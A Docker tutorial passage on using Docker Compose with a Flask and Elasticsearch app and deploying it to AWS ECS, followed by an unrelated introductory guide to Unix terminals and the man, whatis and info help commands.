Other parameters such as command and ports provide more information about the container. The volumes parameter specifies a mount point in our web container where the code will reside. This is purely optional and is useful if you need access to logs, etc. We'll later see how this can be useful during development. Refer to the online reference to learn more about the parameters this file supports. We also add volumes for the es container so that the data we load persists between restarts. We also specify depends_on, which tells Docker to start the es container before web. You can read more about it in the Docker Compose docs.
Note: You must be inside the directory with the docker-compose.yml file in order to execute most Compose commands.
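To make the depends_on idea concrete, here is a small Python sketch that works out a start order from the dependencies declared in the file above. This is only an illustration of what the setting expresses, not how Compose implements it; the SERVICES dictionary is a hand-written mirror of the two services and start_order is a name I made up.

```python
from graphlib import TopologicalSorter  # standard library, Python 3.9+

# Hand-written mirror of the services in the compose file above;
# only the depends_on relationships matter for this sketch.
SERVICES = {
    "es": {"depends_on": []},
    "web": {"depends_on": ["es"]},
}


def start_order(services):
    """Return service names so that each dependency comes before its dependents."""
    graph = {
        name: set(spec.get("depends_on", []))
        for name, spec in services.items()
    }
    return list(TopologicalSorter(graph).static_order())


print(start_order(SERVICES))
```

Keep in mind that this is about ordering only: depends_on gets es started before web, but it does not wait for Elasticsearch to be ready to answer requests.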
Great! Now the file is ready, let's see docker-compose in action. But before we start, we need to make sure the ports and names are free. So if you have the Flask and ES containers running, let's turn them off.
$ docker stop es foodtrucks-web
es
foodtrucks-web
$ docker rm es foodtrucks-web
es
foodtrucks-web
Now we can run docker-compose. Navigate to the food trucks directory and run docker-compose up.
$ docker-compose up
Creating network "foodtrucks_default" with the default driver
Creating foodtrucks_es_1
Creating foodtrucks_web_1
Attaching to foodtrucks_es_1, foodtrucks_web_1
es_1 | [2016-01-11 03:43:50,300][INFO ][node ] [Comet] version[2.1.1], pid[1], build[40e2c53/2015-12-15T13:05:55Z]
es_1 | [2016-01-11 03:43:50,307][INFO ][node ] [Comet] initializing ...
es_1 | [2016-01-11 03:43:50,366][INFO ][plugins ] [Comet] loaded [], sites []
es_1 | [2016-01-11 03:43:50,421][INFO ][env ] [Comet] using [1] data paths, mounts [[/usr/share/elasticsearch/data (/dev/sda1)]], net usable_space [16gb], net total_space [18.1gb], spins? [possibly], types [ext4]
es_1 | [2016-01-11 03:43:52,626][INFO ][node ] [Comet] initialized
es_1 | [2016-01-11 03:43:52,632][INFO ][node ] [Comet] starting ...
es_1 | [2016-01-11 03:43:52,703][WARN ][common.network ] [Comet] publish address: {0.0.0.0} is a wildcard address, falling back to first non-loopback: {172.17.0.2}
es_1 | [2016-01-11 03:43:52,704][INFO ][transport ] [Comet] publish_address {172.17.0.2:9300}, bound_addresses {[::]:9300}
es_1 | [2016-01-11 03:43:52,721][INFO ][discovery ] [Comet] elasticsearch/cEk4s7pdQ-evRc9MqS2wqw
es_1 | [2016-01-11 03:43:55,785][INFO ][cluster.service ] [Comet] new_master {Comet}{cEk4s7pdQ-evRc9MqS2wqw}{172.17.0.2}{172.17.0.2:9300}, reason: zen-disco-join(elected_as_master, [0] joins received)
es_1 | [2016-01-11 03:43:55,818][WARN ][common.network ] [Comet] publish address: {0.0.0.0} is a wildcard address, falling back to first non-loopback: {172.17.0.2}
es_1 | [2016-01-11 03:43:55,819][INFO ][http ] [Comet] publish_address {172.17.0.2:9200}, bound_addresses {[::]:9200}
es_1 | [2016-01-11 03:43:55,819][INFO ][node ] [Comet] started
es_1 | [2016-01-11 03:43:55,826][INFO ][gateway ] [Comet] recovered [0] indices into cluster_state
es_1 | [2016-01-11 03:44:01,825][INFO ][cluster.metadata ] [Comet] [sfdata] creating index, cause [auto(index api)], templates [], shards [5]/[1], mappings [truck]
es_1 | [2016-01-11 03:44:02,373][INFO ][cluster.metadata ] [Comet] [sfdata] update_mapping [truck]
es_1 | [2016-01-11 03:44:02,510][INFO ][cluster.metadata ] [Comet] [sfdata] update_mapping [truck]
es_1 | [2016-01-11 03:44:02,593][INFO ][cluster.metadata ] [Comet] [sfdata] update_mapping [truck]
es_1 | [2016-01-11 03:44:02,708][INFO ][cluster.metadata ] [Comet] [sfdata] update_mapping [truck]
es_1 | [2016-01-11 03:44:03,047][INFO ][cluster.metadata ] [Comet] [sfdata] update_mapping [truck]
web_1 | * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)
Head over to the IP to see your app live. That was amazing, wasn't it? Just a few lines of configuration and we have two Docker containers running successfully in unison. Let's stop the services and re-run in detached mode.
web_1 | * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)
Killing foodtrucks_web_1 ... done
Killing foodtrucks_es_1 ... done
$ docker-compose up -d
Creating es ... done
Creating foodtrucks_web_1 ... done
$ docker-compose ps
Name Command State Ports
--------------------------------------------------------------------------------------------
es /usr/local/bin/docker-entr ... Up 0.0.0.0:9200->9200/tcp, 9300/tcp
foodtrucks_web_1 python3 app.py Up 0.0.0.0:5000->5000/tcp
Unsurprisingly, we can see both containers running successfully. Where do the names come from? Those were created automatically by Compose. But does Compose also create the network automatically? Good question! Let's find out.
First off, let us stop the services from running. We can always bring them back up with just one command. Data volumes will persist, so it's possible to start the cluster again with the same data using docker-compose up. To destroy the cluster and the data volumes, just type docker-compose down -v.
$ docker-compose down -v
Stopping foodtrucks_web_1 ... done
Stopping es ... done
Removing foodtrucks_web_1 ... done
Removing es ... done
Removing network foodtrucks_default
Removing volume foodtrucks_esdata1
While we're at it, we'll also remove the foodtrucks-net network that we created last time.
$ docker network rm foodtrucks-net
$ docker network ls
NETWORK ID NAME DRIVER SCOPE
c2c695315b3a bridge bridge local
a875bec5d6fd host host local
ead0e804a67b none null local
Great! Now that we have a clean slate, let's re-run our services and see if Compose does its magic.
$ docker-compose up -d
Recreating foodtrucks_es_1
Recreating foodtrucks_web_1
$ docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
f50bb33a3242 yourusername/foodtrucks-web "python3 app.py" 14 seconds ago Up 13 seconds 0.0.0.0:5000->5000/tcp foodtrucks_web_1
e299ceeb4caa elasticsearch "/docker-entrypoint.s" 14 seconds ago Up 14 seconds 9200/tcp, 9300/tcp foodtrucks_es_1
So far, so good. Time to see if any networks were created.
$ docker network ls
NETWORK ID NAME DRIVER SCOPE
c2c695315b3a bridge bridge local
f3b80f381ed3 foodtrucks_default bridge local
a875bec5d6fd host host local
ead0e804a67b none null local
You can see that Compose went ahead and created a new network called foodtrucks_default and attached both the new services to that network so that each is discoverable by the other. Each container for a service joins the default network and is both reachable by other containers on that network, and discoverable by them at a hostname identical to the container name.
$ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
8c6bb7e818ec docker.elastic.co/elasticsearch/elasticsearch:6.3.2 "/usr/local/bin/dock…" About a minute ago Up About a minute 0.0.0.0:9200->9200/tcp, 9300/tcp es
7640cec7feb7 yourusername/foodtrucks-web "python3 app.py" About a minute ago Up About a minute 0.0.0.0:5000->5000/tcp foodtrucks_web_1
$ docker network inspect foodtrucks_default
[
{
"Name": "foodtrucks_default",
"Id": "f3b80f381ed3e03b3d5e605e42c4a576e32d38ba24399e963d7dad848b3b4fe7",
"Created": "2018-07-30T03:36:06.0384826Z",
"Scope": "local",
"Driver": "bridge",
"EnableIPv6": false,
"IPAM": {
"Driver": "default",
"Options": null,
"Config": [
{
"Subnet": "172.19.0.0/16",
"Gateway": "172.19.0.1"
}
]
},
"Internal": false,
"Attachable": true,
"Ingress": false,
"ConfigFrom": {
"Network": ""
},
"ConfigOnly": false,
"Containers": {
"7640cec7feb7f5615eaac376271a93fb8bab2ce54c7257256bf16716e05c65a5": {
"Name": "foodtrucks_web_1",
"EndpointID": "b1aa3e735402abafea3edfbba605eb4617f81d94f1b5f8fcc566a874660a0266",
"MacAddress": "02:42:ac:13:00:02",
"IPv4Address": "172.19.0.2/16",
"IPv6Address": ""
},
"8c6bb7e818ec1f88c37f375c18f00beb030b31f4b10aee5a0952aad753314b57": {
"Name": "es",
"EndpointID": "649b3567d38e5e6f03fa6c004a4302508c14a5f2ac086ee6dcf13ddef936de7b",
"MacAddress": "02:42:ac:13:00:03",
"IPv4Address": "172.19.0.3/16",
"IPv6Address": ""
}
},
"Options": {},
"Labels": {
"com.docker.compose.network": "default",
"com.docker.compose.project": "foodtrucks",
"com.docker.compose.version": "1.21.2"
}
}
]
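If you want to pull the interesting bits out of that JSON programmatically, here is a short Python sketch. The INSPECT_OUTPUT string is a trimmed copy of the output above (container IDs shortened, unused fields dropped), and container_addresses is just a helper name I picked for the example.

```python
import json

# Trimmed copy of the inspect output above: shortened container IDs,
# and only the fields this sketch reads.
INSPECT_OUTPUT = """
[
  {
    "Name": "foodtrucks_default",
    "Containers": {
      "7640cec7feb7": {"Name": "foodtrucks_web_1", "IPv4Address": "172.19.0.2/16"},
      "8c6bb7e818ec": {"Name": "es", "IPv4Address": "172.19.0.3/16"}
    }
  }
]
"""


def container_addresses(inspect_json):
    """Map container name -> IPv4 address (without the /16 prefix length)."""
    network = json.loads(inspect_json)[0]  # inspect returns a list of networks
    return {
        info["Name"]: info["IPv4Address"].split("/")[0]
        for info in network["Containers"].values()
    }


print(container_addresses(INSPECT_OUTPUT))
```

In practice you rarely need the IP addresses at all, since the containers can reach each other by name on this network, but it is a handy way to confirm that both services really landed on foodtrucks_default.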
Development Workflow
Before we jump to the next section, there's one last thing I wanted to cover about docker-compose. As stated earlier, docker-compose is really great for development and testing. So let's see how we can configure compose to make our lives easier during development.
Throughout this tutorial, we've worked with ready-made Docker images. While we've built images from scratch, we haven't touched any application code yet and have mostly restricted ourselves to editing Dockerfiles and YAML configurations. One thing you must be wondering is what the workflow looks like during development. Is one supposed to keep creating Docker images for every change, then publish them and run them to see if the changes work as expected? I'm sure that sounds super tedious. There has to be a better way. In this section, that's what we're going to explore.
Let's see how we can make a change in the Foodtrucks app we just ran. Make sure you have the app running,
$ docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
5450ebedd03c yourusername/foodtrucks-web "python3 app.py" 9 seconds ago Up 6 seconds 0.0.0.0:5000->5000/tcp foodtrucks_web_1
05d408b25dfe docker.elastic.co/elasticsearch/elasticsearch:6.3.2 "/usr/local/bin/dock…" 10 hours ago Up 10 hours 0.0.0.0:9200->9200/tcp, 9300/tcp es
Now let's see if we can change this app to display a Hello world! message when a request is made to the /hello route. Currently, the app responds with a 404.
$ curl -I 0.0.0.0:5000/hello
HTTP/1.0 404 NOT FOUND
Content-Type: text/html
Content-Length: 233
Server: Werkzeug/0.11.2 Python/2.7.15rc1
Date: Mon, 30 Jul 2018 15:34:38 GMT
Why does this happen? Since ours is a Flask app, we can look at app.py for answers. In Flask, routes are defined with the @app.route syntax. In the file, you'll see that we only have three routes defined - /, /debug and /search. The / route renders the main app, the debug route is used to return some debug information and finally search is used by the app to query elasticsearch.
$ curl 0.0.0.0:5000/debug
{
"msg": "yellow open sfdata Ibkx7WYjSt-g8NZXOEtTMg 5 1 618 0 1.3mb 1.3mb\n",
"status": "success"
}
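If the decorator-based routing feels a bit magical, here is a toy sketch in plain Python of the general idea: a decorator stores a handler under a path, and anything that was never registered ends up as a 404. This is not Flask's actual implementation, and ROUTES, route and dispatch are names invented for this example.

```python
ROUTES = {}  # path -> handler function


def route(path):
    """Decorator that registers a handler for a path (toy stand-in for @app.route)."""
    def register(handler):
        ROUTES[path] = handler
        return handler
    return register


def dispatch(path):
    """Return (status, body) for a request path."""
    handler = ROUTES.get(path)
    if handler is None:
        return 404, "NOT FOUND"
    return 200, handler()


@route("/")
def index():
    return "main app"


print(dispatch("/hello"))  # nothing registered for /hello yet


@route("/hello")
def hello():
    return "hello world!"


print(dispatch("/hello"))  # now a handler exists
```

The takeaway is the same as with the real app: a path only works once some code has registered a handler for it.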
Given that context, how would we add a new route for hello? You guessed it! Let's open flask-app/app.py in our favorite editor and make the following change
@app.route('/')
def index():
    return render_template("index.html")

# add a new hello route
@app.route('/hello')
def hello():
    return "hello world!"
Now let's try making a request again
$ curl -I 0.0.0.0:5000/hello
HTTP/1.0 404 NOT FOUND
Content-Type: text/html
Content-Length: 233
Server: Werkzeug/0.11.2 Python/2.7.15rc1
Date: Mon, 30 Jul 2018 15:34:38 GMT
Oh no! That didn't work! What did we do wrong? While we did make the change in app.py, the file resides in our machine (or the host machine), but since Docker is running our containers based off the yourusername/foodtrucks-web image, it doesn't know about this change. To validate this, let's try the following -
$ docker-compose run web bash
Starting es ... done
root@581e351c82b0:/opt/flask-app# ls
app.py package-lock.json requirements.txt templates
node_modules package.json static webpack.config.js
root@581e351c82b0:/opt/flask-app# grep hello app.py
root@581e351c82b0:/opt/flask-app# exit
What we're trying to do here is to validate that our changes are not in the app.py that's running in the container. We do this by running the command docker-compose run, which is similar to its cousin docker run but takes additional arguments for the service (which is web in our case). As soon as we run bash, the shell opens in /opt/flask-app as specified in our Dockerfile. From the grep command we can see that our changes are not in the file.
Let's see how we can fix it. First off, we need to tell Docker Compose to not use the image and instead use the files locally. We'll also set debug mode to true so that Flask knows to reload the server when app.py changes. Replace the web portion of the docker-compose.yml file like so:
version: "3"
services:
  es:
    image: docker.elastic.co/elasticsearch/elasticsearch:6.3.2
    container_name: es
    environment:
      - discovery.type=single-node
    ports:
      - 9200:9200
    volumes:
      - esdata1:/usr/share/elasticsearch/data
  web:
    build: . # replaced image with build
    command: python3 app.py
    environment:
      - DEBUG=True # set an env var for flask
    depends_on:
      - es
    ports:
      - "5000:5000"
    volumes:
      - ./flask-app:/opt/flask-app
volumes:
  esdata1:
    driver: local
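On the Python side, an environment variable like DEBUG=True arrives as a plain string, so the app has to turn it into a boolean somehow. How app.py in the repo does this isn't shown here, so treat the following as one possible sketch; env_flag and the set of accepted spellings are my own assumptions.

```python
import os


def env_flag(name, default=False, environ=None):
    """Interpret an environment variable such as DEBUG=True as a boolean."""
    environ = os.environ if environ is None else environ
    raw = environ.get(name)
    if raw is None:
        return default  # variable not set at all
    return raw.strip().lower() in {"1", "true", "yes", "on"}


# Passing a dict instead of os.environ makes the helper easy to try out.
print(env_flag("DEBUG", environ={"DEBUG": "True"}))
print(env_flag("DEBUG", environ={}))
```

A value produced this way could then be handed to Flask's debug setting, so that the server reloads whenever the mounted app.py changes.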
With that change, let's stop and start the containers.
$ docker-compose down -v
Stopping foodtrucks_web_1 ... done
Stopping es ... done
Removing foodtrucks_web_1 ... done
Removing es ... done
Removing network foodtrucks_default
Removing volume foodtrucks_esdata1
$ docker-compose up -d
Creating network "foodtrucks_default" with the default driver
Creating volume "foodtrucks_esdata1" with local driver
Creating es ... done
Creating foodtrucks_web_1 ... done
As a final step, let's make the change in app.py by adding a new route. Now we try to curl
$ curl 0.0.0.0:5000/hello
hello world!
Wohoo! We get a valid response! Try playing around by making more changes in the app.
That concludes our tour of Docker Compose. With Docker Compose, you can also pause your services, run a one-off command on a container and even scale the number of containers. I also recommend you check out a few other use cases of Docker Compose. Hopefully, I was able to show you how easy it is to manage multi-container environments with Compose. In the final section, we are going to deploy our app to AWS!
AWS Elastic Container Service
In the last section we used docker-compose to run our app locally with a single command: docker-compose up. Now that we have a functioning app we want to share this with the world, get some users, make tons of money and buy a big house in Miami. Executing the last three is beyond the scope of the tutorial, so we'll spend our time instead on figuring out how we can deploy our multi-container apps on the cloud with AWS.
If you've read this far you are pretty much convinced that Docker is a pretty cool technology. And you are not alone. Seeing the meteoric rise of Docker, almost all Cloud vendors started working on adding support for deploying Docker apps on their platform. As of today, you can deploy containers on Google Cloud Platform, AWS, Azure and many others. We already got a primer on deploying single container apps with Elastic Beanstalk and in this section we are going to look at Elastic Container Service (or ECS) by AWS.
AWS ECS is a scalable and super flexible container management service that supports Docker containers. It allows you to operate a Docker cluster on top of EC2 instances via an easy-to-use API. Where Beanstalk came with reasonable defaults, ECS allows you to completely tune your environment as per your needs. This makes ECS, in my opinion, quite complex to get started with.
Luckily for us, ECS has a friendly CLI tool that understands Docker Compose files and automatically provisions the cluster on ECS! Since we already have a functioning docker-compose.yml it should not take a lot of effort in getting up and running on AWS. So let's get started!
The first step is to install the CLI. Instructions to install the CLI on both Mac and Linux are explained very clearly in the official docs. Go ahead, install the CLI and when you are done, verify the install by running
$ ecs-cli --version
ecs-cli version 1.18.1 (7e9df84)
Next, we'll be working on configuring the CLI so that we can talk to ECS. We'll be following the steps as detailed in the official guide on AWS ECS docs. In case of any confusion, please feel free to refer to that guide.
The first step will involve creating a profile that we'll use for the rest of the tutorial. To continue, you'll need your AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY. To obtain these, follow the steps as detailed under the section titled Access Key and Secret Access Key on this page.
$ ecs-cli configure profile --profile-name ecs-foodtrucks --access-key $AWS_ACCESS_KEY_ID --secret-key $AWS_SECRET_ACCESS_KEY
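Since the command above silently expands to empty strings if the two variables aren't set, it can be worth checking for them first. Here is a small Python sketch of such a check; require_credentials is a hypothetical helper of mine, not something that ships with ecs-cli.

```python
import os


def require_credentials(environ=None):
    """Return the two AWS credential variables, or raise if one is missing or empty."""
    environ = os.environ if environ is None else environ
    names = ("AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY")
    missing = [name for name in names if not environ.get(name)]
    if missing:
        raise RuntimeError("missing environment variables: " + ", ".join(missing))
    return {name: environ[name] for name in names}


if __name__ == "__main__":
    try:
        require_credentials()
        print("credentials found, safe to run ecs-cli configure profile")
    except RuntimeError as error:
        print(error)
```

Note that the sketch never prints the values themselves, which is a good habit with secrets.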
Next, we need to get a keypair which we'll be using to log into the instances. Head over to your EC2 Console and create a new keypair. Download the keypair and store it in a safe location. Another thing to note before you move away from this screen is the region name. In my case, I have named my key - ecs and set my region as us-east-1. This is what I'll assume for the rest of this walkthrough.
The next step is to configure the CLI.
$ ecs-cli configure --region us-east-1 --cluster foodtrucks
INFO[0000] Saved ECS CLI configuration for cluster (foodtrucks)
We provide the configure command with the region name we want our cluster to reside in and a cluster name. Make sure you provide the same region name that you used when creating the keypair. If you've not configured the AWS CLI on your computer before, you can use the official guide, which explains everything in great detail on how to get everything going.
The next step enables the CLI to create a CloudFormation template.
$ ecs-cli up --keypair ecs --capability-iam --size 1 --instance-type t2.medium
INFO[0000] Using recommended Amazon Linux 2 AMI with ECS Agent 1.39.0 and Docker version 18.09.9-ce
INFO[0000] Created cluster cluster=foodtrucks
INFO[0001] Waiting for your cluster resources to be created
INFO[0001] Cloudformation stack status stackStatus=CREATE_IN_PROGRESS
INFO[0062] Cloudformation stack status stackStatus=CREATE_IN_PROGRESS
INFO[0122] Cloudformation stack status stackStatus=CREATE_IN_PROGRESS
INFO[0182] Cloudformation stack status stackStatus=CREATE_IN_PROGRESS
INFO[0242] Cloudformation stack status stackStatus=CREATE_IN_PROGRESS
VPC created: vpc-0bbed8536930053a6
Security Group created: sg-0cf767fb4d01a3f99
Subnet created: subnet-05de1db2cb1a50ab8
Subnet created: subnet-01e1e8bc95d49d0fd
Cluster creation succeeded.
Here we provide the name of the keypair we downloaded initially (ecs in my case), the number of instances that we want to use (--size) and the type of instances that we want the containers to run on. The --capability-iam flag tells the CLI that we acknowledge that this command may create IAM resources.
The last and final step is where we'll use our docker-compose.yml file. We'll need to make a few minor changes, so instead of modifying the original, let's make a copy of it. The contents of this file (after making the changes) look like this -
version: '2'
services:
  es:
    image: docker.elastic.co/elasticsearch/elasticsearch:7.6.2
    cpu_shares: 100
    mem_limit: 3621440000
    environment:
      - discovery.type=single-node
      - bootstrap.memory_lock=true
      - "ES_JAVA_OPTS=-Xms512m -Xmx512m"
    logging:
      driver: awslogs
      options:
        awslogs-group: foodtrucks
        awslogs-region: us-east-1
        awslogs-stream-prefix: es
  web:
    image: yourusername/foodtrucks-web
    cpu_shares: 100
    mem_limit: 262144000
    ports:
      - "80:5000"
    links:
      - es
    logging:
      driver: awslogs
      options:
        awslogs-group: foodtrucks
        awslogs-region: us-east-1
        awslogs-stream-prefix: web
The main changes we made from the original docker-compose.yml are providing the mem_limit (in bytes) and cpu_shares values for each container and adding some logging configuration. This allows us to view logs generated by our containers in AWS CloudWatch. Head over to CloudWatch to create a log group called foodtrucks. Note that since ElasticSearch typically ends up taking more memory, we've given around 3.4 GB of memory limit. Another thing we need to do before we move onto the next step is to publish our image on Docker Hub.
$ docker push yourusername/foodtrucks-web
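A quick aside on the mem_limit values in the ECS compose file: raw byte counts are hard to read, so here is a tiny Python sketch that converts them into friendlier units. The helper names are mine, and the two numbers are copied from the file above.

```python
def bytes_to_mib(n):
    """Convert bytes to mebibytes (1 MiB = 2**20 bytes)."""
    return n / 2**20


def bytes_to_gib(n):
    """Convert bytes to gibibytes (1 GiB = 2**30 bytes)."""
    return n / 2**30


# mem_limit values copied from the compose file above
LIMITS = {"es": 3621440000, "web": 262144000}

for service, limit in LIMITS.items():
    print(f"{service}: {bytes_to_mib(limit):.0f} MiB ({bytes_to_gib(limit):.2f} GiB)")
```

Running it shows that the web limit is a round number of MiB, while the es limit takes up most of the memory on the instance, which is why the instance type matters for this setup.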
Great! Now let's run the final command that will deploy our app on ECS!
$ cd aws-ecs
$ ecs-cli compose up
INFO[0000] Using ECS task definition TaskDefinition=ecscompose-foodtrucks:2
INFO[0000] Starting container... container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/es
INFO[0000] Starting container... container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/web
INFO[0000] Describe ECS container status container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/web desiredStatus=RUNNING lastStatus=PENDING taskDefinition=ecscompose-foodtrucks:2
INFO[0000] Describe ECS container status container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/es desiredStatus=RUNNING lastStatus=PENDING taskDefinition=ecscompose-foodtrucks:2
INFO[0036] Describe ECS container status container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/es desiredStatus=RUNNING lastStatus=PENDING taskDefinition=ecscompose-foodtrucks:2
INFO[0048] Describe ECS container status container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/web desiredStatus=RUNNING lastStatus=PENDING taskDefinition=ecscompose-foodtrucks:2
INFO[0048] Describe ECS container status container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/es desiredStatus=RUNNING lastStatus=PENDING taskDefinition=ecscompose-foodtrucks:2
INFO[0060] Started container... container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/web desiredStatus=RUNNING lastStatus=RUNNING taskDefinition=ecscompose-foodtrucks:2
INFO[0060] Started container... container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/es desiredStatus=RUNNING lastStatus=RUNNING taskDefinition=ecscompose-foodtrucks:2
It's not a coincidence that the invocation above looks similar to the one we used with Docker Compose. If everything went well, you should see a desiredStatus=RUNNING lastStatus=RUNNING as the last line.
Awesome! Our app is live, but how can we access it?
$ ecs-cli ps
Name State Ports TaskDefinition
845e2368-170d-44a7-bf9f-84c7fcd9ae29/web RUNNING 54.86.14.14:80->5000/tcp ecscompose-foodtrucks:2
845e2368-170d-44a7-bf9f-84c7fcd9ae29/es RUNNING ecscompose-foodtrucks:2
Go ahead and open http://54.86.14.14 in your browser and you should see the Food Trucks in all its black-yellow glory! Since we're on the topic, let's see how our AWS ECS console looks.
In the console, we can see that our ECS cluster called 'foodtrucks' was created and is now running 1 task with 2 containers. Spend some time browsing this console to get the hang of all the options that are here.
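If you'd like to script the "how can we access it?" step, the Ports column printed by ecs-cli ps has everything you need. Below is a minimal Python sketch that parses one such entry into its parts and builds a URL from it. The function names and the regular expression are my own, written against the single format shown in the output above, so other formats may well need adjusting.

```python
import re

# Matches entries like "54.86.14.14:80->5000/tcp" from the Ports column.
PORT_RE = re.compile(
    r"^(?P<ip>\d+\.\d+\.\d+\.\d+):(?P<host>\d+)->(?P<container>\d+)/(?P<proto>\w+)$"
)


def parse_port_mapping(text):
    """Split 'IP:HOST->CONTAINER/PROTO' into (ip, host_port, container_port, proto)."""
    match = PORT_RE.match(text.strip())
    if match is None:
        raise ValueError(f"unrecognised port mapping: {text!r}")
    return (
        match["ip"],
        int(match["host"]),
        int(match["container"]),
        match["proto"],
    )


def public_url(text):
    """Build the URL to open in a browser; port 80 is implied by http."""
    ip, host_port, _, _ = parse_port_mapping(text)
    return f"http://{ip}" if host_port == 80 else f"http://{ip}:{host_port}"


print(public_url("54.86.14.14:80->5000/tcp"))
```

The mapping reads the same way as in docker container ls: the left side is what the outside world connects to, and the right side is the port the Flask app listens on inside the container.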
Cleanup
Once you've played around with the deployed app, remember to turn down the cluster -
$ ecs-cli down --force
INFO[0001] Waiting for your cluster resources to be deleted...
INFO[0001] Cloudformation stack status stackStatus=DELETE_IN_PROGRESS
INFO[0062] Cloudformation stack status stackStatus=DELETE_IN_PROGRESS
INFO[0124] Cloudformation stack status stackStatus=DELETE_IN_PROGRESS
INFO[0155] Deleted cluster cluster=foodtrucks
So there you have it. With just a few commands we were able to deploy our awesome app on the AWS cloud!
Conclusion
And that's a wrap! After a long, exhaustive but fun tutorial you are now ready to take the container world by storm! If you followed along till the very end then you should definitely be proud of yourself. You learned how to set up Docker, run your own containers, play with static and dynamic websites and most importantly got hands-on experience with deploying your applications to the cloud!
I hope that finishing this tutorial makes you more confident in your abilities to deal with servers. When you have an idea of building your next app, you can be sure that you'll be able to get it in front of people with minimal effort.
Next Steps
Your journey into the container world has just started! My goal with this tutorial was to whet your appetite and show you the power of Docker. In the sea of new technology, it can be hard to navigate the waters alone and tutorials such as this one can provide a helping hand. This is the Docker tutorial I wish I had when I was starting out. Hopefully, it served its purpose of getting you excited about containers so that you no longer have to watch the action from the sides.
Below are a few additional resources that will be beneficial. For your next project, I strongly encourage you to use Docker. Keep in mind - practice makes perfect!
Additional Resources
Off you go, young padawan!
Give Feedback
Now that the tutorial is over, it's my turn to ask questions. How did you like the tutorial? Did you find the tutorial to be a complete mess or did you have fun and learn something?
Send in your thoughts directly to me or just create an issue. I'm on Twitter, too, so if that's your deal, feel free to holler there!
I would totally love to hear about your experience with this tutorial. Give suggestions on how to make this better or let me know about my mistakes. I want this tutorial to be one of the best introductory tutorials on the web and I can't do it without your help.
Linux OS Installation and Basics
https://linuxtools-rst.readthedocs.io/zh_CN/latest/base/index.html
https://www.tutorialspoint.com/unix/index.htm
https://www.digitalocean.com/community/tutorials/an-introduction-to-linux-basics
What is Unix?
The Unix operating system is a set of programs that act as a link between the computer and the user.
The computer programs that allocate the system resources and coordinate all the details of the computer's internals are called the operating system or the kernel.
Users communicate with the kernel through a program known as the shell. The shell is a command line interpreter; it translates commands entered by the user and converts them into a language that is understood by the kernel.
- Unix was originally developed in 1969 at Bell Labs by a group of AT&T employees: Ken Thompson, Dennis Ritchie, Douglas McIlroy, and Joe Ossanna.
- There are various Unix variants available in the market. Solaris Unix, AIX, HP Unix, and BSD are a few examples. Linux is a freely available Unix-like system.
- Several people can use a Unix computer at the same time; hence Unix is called a multiuser system.
- A user can also run multiple programs at the same time; hence Unix is a multitasking environment.
Prerequisites
To follow along with this guide, you will need access to a computer running a Linux-based operating system. This can either be a virtual private server that you’ve connected to with SSH or your local machine. Note that this tutorial was validated using a Linux server running Ubuntu 20.04, but the examples given should work on a computer running any version of any Linux distribution.
If you plan to use a remote server to follow this guide, we encourage you to first complete our Initial Server Setup guide. Doing so will set you up with a secure server environment (including a non-root user with sudo privileges and a firewall configured with UFW) which you can use to build your Linux skills.
The Terminal
The terms “terminal,” “shell,” and “command line interface” are often used interchangeably, but there are subtle differences between them:
- A terminal is an input and output environment that presents a text-only window running a shell.
- A shell is a program that exposes the computer’s operating system to a user or program. In Linux systems, the shell presented in a terminal is a command line interpreter.
- A command line interface is a user interface (managed by a command line interpreter program) that processes commands to a computer program and outputs the results.
When someone refers to one of these three terms in the context of Linux, they generally mean a terminal environment where you can run commands and see the results printed out to the terminal.
Becoming a Linux expert requires you to be comfortable with using a terminal. Any administrative task, including file manipulation, package installation, and user management, can be accomplished through the terminal. The terminal is interactive: you specify commands to run and the terminal outputs the results of those commands. To execute any command, you type it into the prompt and press ENTER.
When accessing a cloud server, you’ll most often be doing so through a terminal shell. Although personal computers that run Linux often come with the kind of graphical desktop environment familiar to most computer users, it is often more efficient or practical to perform certain tasks through commands entered into the terminal.
Learn to use command help
Overview
In the Linux terminal, when we don't know how to use a command, or don't remember the spelling of a command or its parameters, we need to turn to the system's help documentation. The built-in help documentation in Linux is very detailed and usually solves our problems, so we need to know how to use it properly.
- When we only remember part of a command's name or purpose, we can search by keyword with man -k.
- For a brief description of a command, we can use whatis; for a more detailed description, we can use the info command.
- To see where a command is located, we use which.
- For the specific parameters of a command and how to use it, we use the powerful man.
These commands are described below.
Command usage
View a brief description of the command
A brief description of what the command does (showing the man category page where the command is located):
$whatis command
Wildcard match:
$whatis -w "loca*"
More detailed documentation:
$info command
Using man
Query the documentation for the command command:
$man command
eg: man date
Use Page Up and Page Down to scroll through the manual.
The man help manual is divided into 9 categories (sections). A keyword may exist in more than one category, in which case we need to specify the category to view (shell commands are generally in category 1).
The category a man page belongs to is shown by its number (categories 1 and 3 are the most commonly used):
(1), user commands and executable files
(2), system calls (functions provided by the kernel)
(3), library functions
(4), device files (special files)
(5), file formats and configuration files
(6), games
(7), conventions, protocols, and miscellaneous topics, for example the standard file system layout, network protocols, and ASCII
(8), system administration commands
(9), kernel routines
As mentioned earlier, whatis shows the specific category in which a command is documented:
eg:
$whatis printf
printf (1) - format and print data
printf (1p) - write formatted output
printf (3) - formatted output conversion
printf (3p) - print formatted output
printf [builtins] (1) - bash built-in commands, see bash(1)
We see that printf is available in both category 1 and category 3. The pages in category 1 document commands and executables, while category 3 documents library functions. If we want to see how printf is used in C, we can ask for the help in category 3:
$man 3 printf
$man -k keyword
Query commands based on a keyword in their name or description, for occasions when only part of the command is remembered.
eg: Find GNOME's config tool command:
$man -k GNOME config| grep 1
To search for a word inside a man page, type /word, for example /-a. Also check the SEE ALSO section of a page for related documentation.
Checking paths
Check the path to the program's binary file:
$which command
eg: Find the path where the make program is installed:
